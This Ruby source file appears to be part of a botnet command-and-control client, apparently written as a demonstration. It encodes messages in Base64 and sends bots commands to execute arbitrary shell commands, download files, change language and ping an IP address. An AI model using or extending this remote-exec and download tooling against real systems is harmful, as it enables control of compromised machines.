require "base64"

# Check the message length then encode
def encode_message (message)
	if message.length() > 130
		puts "Message too long, max length 130 characters. Aborting"
		exit 1
	end

	enc_message = "xx" + Base64.encode64(message)
	# Remove any new lines added by Base64 encoding
	enc_message.gsub!("\n","")

	return enc_message
end

# Send an exec command, the format for this is :cmd exec <command>
# On a linux system, unless the command is terminated with an & the
# bot will probably block until the command is finished
def send_exec_command(filename, verbose)
	if verbose
		puts "Execute command"
	end
	message = encode_message("exec " + filename)
	send_command(message,verbose)
end

# Send a get command. The bot will download the specified file
def send_get_command(filename, verbose)
	if verbose
		puts "Get command"
	end
	message = encode_message("get " + filename)
	send_command(message,verbose)
end

# Change the language to the one specified
def send_new_language_command(language, verbose)
	if verbose
		puts "New language command"
	end
	message=encode_message("language " + language)
	send_command(message,verbose)
end

# Send a ping command. The bot will ping the specified IP address
# Only doing IP at the moment so I can show input validation
def send_ping_command(ip_address, verbose)
	if verbose
		puts "Ping command"
	end
	message = encode_message("ping " + ip_address)
	send_command(message,verbose)
end
